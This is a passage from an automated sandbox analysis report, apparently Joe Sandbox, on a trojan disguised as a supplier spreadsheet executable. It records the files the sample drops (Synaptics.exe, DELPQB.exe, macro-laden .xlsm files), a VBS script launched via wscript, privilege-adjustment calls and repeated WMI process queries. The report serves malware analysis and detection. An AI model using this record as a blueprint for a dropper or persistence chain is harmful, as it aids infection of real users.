                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00924EBF9_2_00924EBF
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00910EC49_2_00910EC4
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009530AD9_2_009530AD
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0092113E9_2_0092113E
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009112F99_2_009112F9
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0092542F9_2_0092542F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_009036809_2_00903680
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0092599F9_2_0092599F
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0091DA749_2_0091DA74
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0091BDF69_2_0091BDF6
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008FBDF09_2_008FBDF0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_008F5D329_2_008F5D32
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00911E5A9_2_00911E5A
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0093BFB89_2_0093BFB8
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_00927FFD9_2_00927FFD
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0091DF699_2_0091DF69
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: zWdpyzM9.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                                Source: GLTYDMDUST.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                                Source: Joe Sandbox ViewDropped File: C:\ProgramData\Synaptics\RCXC902.tmp 7D8C783C45AFF23E64E6E801C0F988002078A0E8DA5F85285BB335F997E7E50D
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: String function: 00D8F885 appears 68 times
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: String function: 00D97750 appears 42 times
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 0090F885 appears 68 times
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: String function: 00917750 appears 42 times
                                Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: RCXC902.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227187533.00000000004A5000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235546842.0000000000735000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000002.1236440474.0000000000771000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000002.1236440474.0000000000782000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235546842.000000000072A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exe, 00000000.00000003.1235406785.0000000002310000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: OriginalFileName vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exeBinary or memory string: OriginalFilenameb! vs Supplier 0202AW-PER2 Sheet.exe
                                Source: Supplier 0202AW-PER2 Sheet.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@23/49@8/4
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBD712 GetLastError,FormatMessageW,2_2_00DBD712
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DAB8B0 AdjustTokenPrivileges,CloseHandle,2_2_00DAB8B0
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DABEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00DABEC3
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0092B8B0 AdjustTokenPrivileges,CloseHandle,9_2_0092B8B0
                                Source: C:\Users\user\AppData\Roaming\Windata\DELPQB.exeCode function: 9_2_0092BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,9_2_0092BEC3
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00DBEA85
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DB6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00DB6F5B
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00DBEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_00DBEFCD
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeCode function: 2_2_00D731F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00D731F2
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xmlJump to behavior
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeJump to behavior
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7520:120:WilError_03
                                Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7412
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeFile created: C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbsJump to behavior
                                Source: Yara matchFile source: Supplier 0202AW-PER2 Sheet.exe, type: SAMPLE
                                Source: Yara matchFile source: 0.0.Supplier 0202AW-PER2 Sheet.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\RCXC902.tmp, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                                Source: C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs
                                Source: C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Supplier 0202AW-PER2 Sheet.exe'
